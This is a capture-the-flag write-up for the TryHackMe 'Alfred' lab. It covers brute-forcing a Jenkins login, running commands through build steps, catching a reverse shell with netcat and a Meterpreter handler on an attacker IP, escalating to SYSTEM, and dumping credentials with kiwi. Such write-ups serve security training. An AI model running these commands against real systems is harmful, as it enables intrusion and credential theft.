TryHackMe Writeup: Alfred

PwnPalace
4 min readFeb 6, 2021

We will start off by enumerating the provided host for common web ports using the browser (80,8080,443)

Port 80 returns a relatively empty web page:

Port 8080 returns a Jenkins login page

Port 443 returns nothing. Lets focus on the login form. When submitting credentials, you’ll notice the application throws an error: Invalid username or password

Lets use that error to set up a brute force attack. You can use Hydra if you’d like, but I’m going to show you how to do it with burp.

Intercept login request and send to intruder

Select “Clusterbomb” as your attack type

Modify referrer to point to http://10.10.170.185:8080/login

Select the j_username and j_password parameter data, and click the “Add” button

In the “Payloads” tab:

Set payload 1 as simple list, and add your userlist (I used a common cred list)

Set payload 2 as simple list, and add your pass list

Options tab:

Under GREP — MATCH, add your error string

Change “Follow redirections” to “Always”

Start the attack

When the attack is complete, you should get a 200 response as well as the PGREP being unchecked for one set of creds. Lets use those to log in

While playing around with some of the features, you’ll notice that the project configuration section allows you to run an arbitrary commands during build. In this case, we’ll do a simple directory list

dir

Now, just click “Save”, and then “Build Now” on the left hand side of the page

Under permalinks, select the latest build and view the results under “Console Output”

Sweet, it worked. Now lets try to execute a reverse shell using the payload given by TryHackMe. First, set up an http server to serve up the indicated file by navigating to the scripts directory and entering the following:

python3 -m http.server 1337

Then, lets open a different terminal, and set up a netcat listener

nc -nvlp 1338

Now, lets go ahead and execute the given payload by putting the payload in the build’s command window, and building the file

Success! Now, lets read that user.txt file. In this case, the file appears to be on Bruce’s desktop.

Now, we need to somehow escalate privileges. We can go several routes with this, but I’m going to choose the most simple…. With meterpreter. So lets create a reverse tcp shell and upload it the same way we uploaded the powershell file. First, lets set up a listener in Metasploit so that we can leverage metasploits features

use multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 10.9.240.85

set lport 4444

exploit -j -z

Now lets create, upload and invoke the payload

Got eem!

Now, we only have bruces permissions. So lets try a “getsystem” command in meterpreter…

Alternatively, we can use incognito to escalate our privileges by using token impersonation as indicated on the TryHackMe guide for this machine. Now, lets migrate into a 64 bit process with SYSTEM privs. Identify your process, identify a 64 bit system process, then migrate.

getpid

ps

migrate 668

Perfect. So before I attempt to read the flag as indicated by TryHackMe, I’m going to see if I can get credentials from memory

load kiwi

creds_all

After noting his password, I am now going to go ahead and drop into a shell and try to read the root flag

Sweet! We have completed this lab. Naturally, you may want to consider doing some more post-exploitation and also see if your discovered creds could be put to good use. As for me, I’m grabbing a beer!

--

--